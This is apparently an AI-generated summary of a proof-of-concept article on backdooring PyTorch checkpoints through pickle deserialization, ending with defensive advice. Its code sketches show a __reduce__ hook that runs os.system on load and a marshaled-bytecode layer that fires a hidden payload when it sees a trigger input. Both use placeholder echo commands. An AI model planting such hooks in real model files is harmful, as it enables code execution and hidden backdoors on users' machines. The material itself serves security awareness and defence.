🤖 AI Summary
A researcher published a proof-of-concept showing how a .pth PyTorch checkpoint can be backdoored because PyTorch serializes model metadata with Python's pickle. The article walks through how pickle's __reduce__ mechanism lets an object specify a callable that runs during unpickling, and shows a basic malicious layer that runs os.system the moment the file is loaded. It then presents a subtler PoC: a wrapper layer whose __reduce__ dynamically reconstructs a real layer from marshaled bytecode (via compile/marshal and types.FunctionType). The reconstructed layer behaves normally but executes a payload when it sees a specific input trigger (torch.zeros(8)), demonstrating a fully functional model that carries a hidden backdoor.
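For intuition, here is a minimal sketch of the __reduce__ trick the article describes; the class name and shell command are placeholders, not the author's exact code.

```python
import os
import pickle


class MaliciousLayer:
    # __reduce__ tells pickle how to rebuild this object. Returning
    # (os.system, ("echo pwned",)) makes the unpickler call os.system
    # with that argument, so the command runs as a side effect of loading.
    def __reduce__(self):
        return (os.system, ("echo pwned",))


blob = pickle.dumps(MaliciousLayer())
pickle.loads(blob)  # executes "echo pwned" during unpickling
```

The subtler variant hides its logic in marshaled bytecode that is rebuilt at load time. A rough sketch of that reconstruction step, under the assumption that the opaque bytes ride inside the pickle and are re-materialized with types.FunctionType (the trigger and payload below are placeholders):

```python
import marshal
import types

# Source of a forward() that acts normally except on the trigger input.
SRC = """
def forward(self, x):
    import os
    import torch
    if torch.equal(x, torch.zeros(8)):   # hidden trigger
        os.system("echo triggered")      # placeholder payload
    return self.linear(x)
"""

# Attacker side: compile and marshal the code so only raw bytes need to
# travel inside the checkpoint.
module_code = compile(SRC, "<hidden>", "exec")
payload_bytes = marshal.dumps(module_code)

# Load side (what a __reduce__ reconstructor could do): turn the bytes
# back into a live function and attach it to an otherwise normal layer.
restored = marshal.loads(payload_bytes)
func_code = next(c for c in restored.co_consts if isinstance(c, types.CodeType))
forward = types.FunctionType(func_code, globals(), "forward")
```

Because the rebuilt layer looks and behaves like an ordinary module on benign inputs, the backdoor is hard to spot by exercising the model normally.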
This matters because many practitioners download community models (Hugging Face, model zoos), and a checkpoint written by torch.save is a zip archive containing model/data.pkl (a pickle stream) plus the weight tensors, so calling torch.load on an untrusted file can lead to arbitrary code execution or stealthy behavioral backdoors. Key technical mitigations: torch.load defaults to weights_only=True starting in PyTorch 2.6, which refuses to unpickle arbitrary objects; passing weights_only=False restores the unsafe behavior. Practical defenses include trusting only vetted sources, inspecting archives (unzip the checkpoint and audit data.pkl), using weights-only loading, sandboxing or VMs for untrusted checkpoints, and running static or behavioral checks for anomalous layers or triggers.
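A minimal sketch of that defensive loading path, assuming the checkpoint is at model.pth (a placeholder path) and your PyTorch version supports the weights_only flag (available since 1.13, default True from 2.6):

```python
import zipfile

import torch

CKPT = "model.pth"  # placeholder path for an untrusted checkpoint

# A .pth checkpoint is a zip archive; list its contents to audit data.pkl
# and the tensor entries before unpickling anything.
with zipfile.ZipFile(CKPT) as zf:
    print(zf.namelist())

# weights_only=True restricts unpickling to tensors and plain containers,
# so a __reduce__-based payload raises an error instead of executing.
state_dict = torch.load(CKPT, map_location="cpu", weights_only=True)
```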